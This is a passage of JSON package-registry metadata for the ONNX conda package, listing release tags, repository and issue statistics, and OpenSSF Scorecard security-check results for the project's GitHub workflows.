v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2026-04-01T16:18:32.894Z","dependent_packages_count":17,"downloads":2555467,"downloads_period":"total","dependent_repos_count":8,"rankings":{"downloads":null,"dependent_repos_count":12.063888195657599,"dependent_packages_count":3.7534314948839533,"stargazers_count":2.1961567257299723,"forks_count":1.8018467681557275,"docker_downloads_count":null,"average":4.953830796106813},"purl":"pkg:conda/onnx?repository_url=https://conda-forge.org","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/onnx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/onnx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/onnx/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-25T16:00:29.826Z","issues_count":1002,"pull_requests_count":2088,"avg_time_to_close_issue":24651025.396024466,"avg_time_to_close_pull_request":3750894.192264574,"issues_closed_count":653,"pull_requests_closed_count":1784,"pull_request_authors_count":174,"issue_authors_count":605,"avg_comments_per_issue":2.6766467065868262,"avg_comments_per_pull_request":1.985632183908046,"merged_pull_requests_count":1448,"bot_issues_count":5,"bot_pull_requests_count":386,"past_year_issues_count":201,"past_year_pull_requests_count":1024,"past_year_avg_time_to_close_issue":1563078.0,"past_year_avg_time_to_close_pull_request":426840.47297297296,"past_year_issues_closed_count":79,"past_year_pull_requests_closed_count":814,"past_year_pull_request_authors_count":69,"past_year_issue_authors_count":120,"past_year_avg_comments_per_issue":1.5621890547263682,"past_year_avg_comments_per_pull_request":1.6904296875,"past_year_bot_issues_count":5,"past_year_bot_pull_requests_count":186,"past_year_merged_pull_requests_count":706,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":435,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"jcwchen","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"zhenhuaw-me","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"prasanthpul","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"houseroad","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"lutzroeder","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"linkerzhang","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"}],"active_maintainers":[{"login":"andife","count":332,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"justinchuby","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/justinchuby"},{"login":"take-cheeze","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/onnx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/onnx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/onnx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/onnx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/onnx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/onnx/codemeta","maintainers":[],"registry":{"name":"conda-forge.org","url":"https://conda-forge.org","ecosystem":"conda","default":false,"packages_count":20636,"maintainers_count":0,"namespaces_count":0,"keywords_count":13549,"github":"conda-forge","metadata":{"kind":"conda-forge","key":"CondaForge","api":"https://conda.anaconda.org","funded_packages_count":2269},"icon_url":"https://github.com/conda-forge.png","created_at":"2022-10-03T15:37:08.743Z","updated_at":"2026-06-10T05:18:51.687Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/namespaces"}},{"id":5285514,"name":"onnx","ecosystem":"conda","description":"Open Neural Network Exchange (ONNX) is the first step toward an open ecosystem that empowers AI developers to choose the right tools as their project evolves. ONNX provides an open source format for AI models. It defines an extensible computation graph model, as well as definitions of built-in operators and standard data types. Initially we focus on the capabilities needed for inferencing (evaluation).","homepage":"https://onnx.ai","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":9,"first_release_published_at":"2022-02-03T17:52:44.000Z","latest_release_published_at":"2026-03-03T13:25:42.000Z","latest_release_number":"1.20.1","last_synced_at":"2026-04-08T23:00:24.376Z","created_at":"2022-10-03T15:42:57.848Z","updated_at":"2026-04-08T23:00:24.377Z","registry_url":"https://anaconda.org/anaconda/onnx","install_command":"conda install -c anaconda onnx","documentation_url":null,"metadata":{},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2026-03-01T18:47:41.000Z","size":66801,"stargazers_count":20408,"open_issues_count":295,"forks_count":3882,"subscribers_count":427,"default_branch":"main","last_synced_at":"2026-03-01T19:42:42.302Z","etag":null,"topics":["ai","artificial-intelligence","deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2026-03-01T18:47:16.000Z","dependencies_parsed_at":"2025-04-15T13:18:07.946Z","dependency_job_id":"18eecf52-5a7d-4c8a-88f2-d8c63852c71f","html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2783,"total_committers":358,"mean_commits":7.773743016759776,"dds":0.903701042040963,"last_synced_commit":"f615b26d564ca5d2e2a28af81f4b86a99a1865f1"},"previous_names":[],"tags_count":37,"template":false,"template_full_name":null,"purl":"pkg:github/onnx/onnx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/sbom","scorecard":{"id":245425,"data":{"date":"2025-08-16T10:32:36Z","repo":{"name":"github.com/onnx/onnx","commit":"3e8c39a7c90f06e3a5ea9561c72770649dcb1b4f"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":6.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: Dependabot: .github/dependabot.yml:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: untrusted code checkout '${{ github.event.pull_request.head.sha }}': .github/workflows/auto_update_doc.yml:25"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/auto_update_doc.yml:22","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:35","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:36","Info: jobLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:26","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:214","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:266","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:304","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:162","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/auto_update_doc.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/check_urls.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/clang_tidy_review.yml:16","Warn: topLevel 'checks' permission set to 'write': .github/workflows/clang_tidy_review_post.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:62","Info: topLevel 'contents' permission set to 'read': .github/workflows/dco_merge_group.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/pages.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/pixi_build.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/preview_source_dist_test.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_linux.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_mac.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_sdist.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_aarch64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_x86_64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/reuse.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/stale.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/weekly_modelzoo.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/win_no_exception_ci.yml:14"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Info: Possibly incomplete results: error parsing shell code: statements must be separated by \u0026, ; or a newline: .github/workflows/main.yml:131","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/copilot-setup-steps.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/copilot-setup-steps.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr_checks.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pr_checks.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:78","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:39","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:40","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:73","Warn: 